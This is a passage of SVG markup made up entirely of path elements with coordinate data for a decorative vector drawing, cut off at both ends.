d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path 